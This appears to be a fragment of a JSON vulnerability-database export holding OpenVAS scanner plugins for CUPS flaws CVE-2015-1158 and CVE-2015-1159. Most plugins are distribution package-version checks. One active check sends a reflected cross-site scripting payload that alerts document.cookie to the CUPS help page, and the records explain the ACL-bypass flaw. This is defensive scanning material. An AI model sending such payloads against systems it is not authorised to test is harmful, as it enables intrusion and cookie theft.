"http://plugins.openvas.org/nasl.php?oid=1361412562310120032", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-559.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120032\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:15:44 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2015-559\");\n script_tag(name:\"insight\", value:\"A string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158 )A cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159 )An integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially-crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash. (CVE-2014-9679 )\");\n script_tag(name:\"solution\", value:\"Run yum update cups to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-559.html\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\", \"CVE-2014-9679\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.4.2~67.21.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.21.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~67.21.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.21.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.21.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.21.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:51:28", "references": ["http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html", "2015:1123"], "pluginID": "1361412562310882201", "description": "Check the version of cups", "edition": 4, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-19T00:00:00", "title": "CentOS Update for cups CESA-2015:1123 centos7 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310882201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882201", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2015:1123 centos7 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882201\");\n script_version(\"$Revision: 6657 $\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:50:44 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-19 06:18:15 +0200 (Fri, 19 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for cups CESA-2015:1123 centos7 \");\n script_tag(name: \"summary\", value: \"Check the version of cups\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\n of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"CUPS provides a portable printing layer for\n Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server\n(CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An\nattacker could use this flaw to bypass the default configuration settings \nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and \nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n\");\n script_tag(name: \"affected\", value: \"cups on CentOS 7\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"CESA\", value: \"2015:1123\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-filesystem\", rpm:\"cups-filesystem~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-ipptool\", rpm:\"cups-ipptool~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.6.3~17.el7_1.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:52:21", "references": ["http://lists.centos.org/pipermail/centos-announce/2015-June/021179.html", "2015:1123"], "pluginID": "1361412562310882202", "description": "Check the version of cups", "edition": 4, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-19T00:00:00", "title": "CentOS Update for cups CESA-2015:1123 centos6 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310882202", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882202", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2015:1123 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882202\");\n script_version(\"$Revision: 6657 $\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:50:44 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-19 06:18:37 +0200 (Fri, 19 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for cups CESA-2015:1123 centos6 \");\n script_tag(name: \"summary\", value: \"Check the version of cups\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the\n help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"CUPS provides a portable printing layer\n for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server\n(CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An\nattacker could use this flaw to bypass the default configuration settings \nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and \nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n\");\n script_tag(name: \"affected\", value: \"cups on CentOS 6\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"CESA\", value: \"2015:1123\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:03:04", "references": ["http://www.ubuntu.com/usn/usn-2629-1/", "2629-1"], "pluginID": "1361412562310842238", "description": "The remote host is missing an update for the ", "edition": 8, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-11T00:00:00", "title": "Ubuntu Update for cups USN-2629-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310842238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842238", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for cups USN-2629-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842238\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-11 06:31:10 +0200 (Thu, 11 Jun 2015)\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for cups USN-2629-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'cups'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that CUPS incorrectly\nhandled reference counting when handling localized strings. A remote attacker\ncould use this issue to escalate permissions, upload a replacement CUPS\nconfiguration file, and execute arbitrary code. (CVE-2015-1158)\n\nIt was discovered that the CUPS templating engine contained a cross-site\nscripting issue. A remote attacker could use this issue to bypass default\nconfiguration settings. (CVE-2015-1159)\");\n script_tag(name:\"affected\", value:\"cups on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2629-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2629-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.7.5-3ubuntu3.2\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.7.2-0ubuntu1.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.5.3-0ubuntu8.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:51:56", "references": ["2015-9726", "https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160444.html"], "pluginID": "1361412562310869513", "description": "Check the version of cups", "edition": 4, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-07-07T00:00:00", "title": "Fedora Update for cups FEDORA-2015-9726", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310869513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869513", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2015-9726\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869513\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:21:21 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for cups FEDORA-2015-9726\");\n script_tag(name: \"summary\", value: \"Check the version of cups\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"CUPS printing system provides a portable\nprinting layer for UNIX operating systems. It has been developed by Apple Inc.\nto promote a standard printing solution for all UNIX vendors and users. CUPS\nprovides the System V and Berkeley command-line interfaces.\n\");\n script_tag(name: \"affected\", value: \"cups on Fedora 22\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-9726\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160444.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~2.0.3~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:39:53", "references": ["https://www.exploit-db.com/exploits/37336", "https://www.kb.cert.org/vuls/id/810572"], "pluginID": "1361412562310105298", "description": "Various versions of CUPS are vulnerable\nto a privilege escalation due to a memory management error.", "edition": 7, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-15T00:00:00", "title": "CUPS < 2.0.3 Multiple Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310105298", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105298", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cups_CVE_2015_1158.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# CUPS < 2.0.3 Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:cups\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105298\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098, 75106);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11872 $\");\n\n script_name(\"CUPS < 2.0.3 Multiple Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/810572\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/37336\");\n\n script_tag(name:\"impact\", value:\"CVE-2015-1158 may allow a remote unauthenticated\nattacker access to privileged operations on the CUPS server. CVE-2015-1159 may allow\nan attacker to execute arbitrary javascript in a user's browser.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request\nand check whether it is able to read cookie or not\");\n\n script_tag(name:\"insight\", value:\"CVE-2015-1158:\nAn issue with how localized strings are handled in cupsd allows a reference\ncounter to over-decrement when handling certain print job request errors. As a\nresult, an attacker can prematurely free an arbitrary string of global scope,\ncreating a dangling pointer to a repurposed block of memory on the heap. The\ndangling pointer causes ACL verification to fail when parsing 'admin/conf' and\n'admin' ACLs. The ACL handling failure results in unrestricted access to\nprivileged operations, allowing an unauthenticated remote user to upload a\nreplacement CUPS configuration file and mount further attacks.\n\nCVE-2015-1159:\nA cross-site scripting bug in the CUPS templating engine allows this bug to be\nexploited when a user browses the web. In certain cases, the CGI template can\necho user input to file rather than escaping the text first. This may be used\nto set up a reflected XSS attack in the QUERY parameter of the web interface\nhelp page. By default, many linux distributions run with the web interface\nactivated, OS X has the web interface deactivated by default.\");\n\n script_tag(name:\"solution\", value:\"A patch addressing these issues has been\nreleased for all supported versions of CUPS. For the version 2.0 branch (the latest\nrelease), 2.0.3 contains the patch.\");\n\n script_tag(name:\"summary\", value:\"Various versions of CUPS are vulnerable\nto a privilege escalation due to a memory management error.\");\n\n script_tag(name:\"affected\", value:\"CUPS < 2.0.3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-15 15:24:12 +0200 (Mon, 15 Jun 2015)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_cups_detect.nasl\");\n script_require_ports(\"Services/www\", 631);\n script_mandatory_keys(\"CUPS/installed\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!cupsPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nurl = \"/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28document.cooki\" +\n \"e%29%3C/script%3E%3C!--&SEARCH=Search\";\n\nif(http_vuln_check(port:cupsPort, url:url, pattern:\"script>alert\\(document.cookie\\)</script>\",\n extra_check: make_list(\">Online Help\", \"CUPS\"), check_header:TRUE))\n{\n report = report_vuln_url( port:cupsPort, url:url );\n security_message(port:cupsPort, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:53:21", "references": ["http://www.debian.org/security/2015/dsa-3283.html"], "pluginID": "703283", "description": "It was discovered that CUPS, the\nCommon UNIX Printing System, is vulnerable to a remotely triggerable privilege\nescalation via cross-site scripting and bad print job submission used to replace\ncupsd.conf on the CUPS server.", "edition": 3, "reporter": "Copyright (c) 2015 Greenbone Networks GmbH 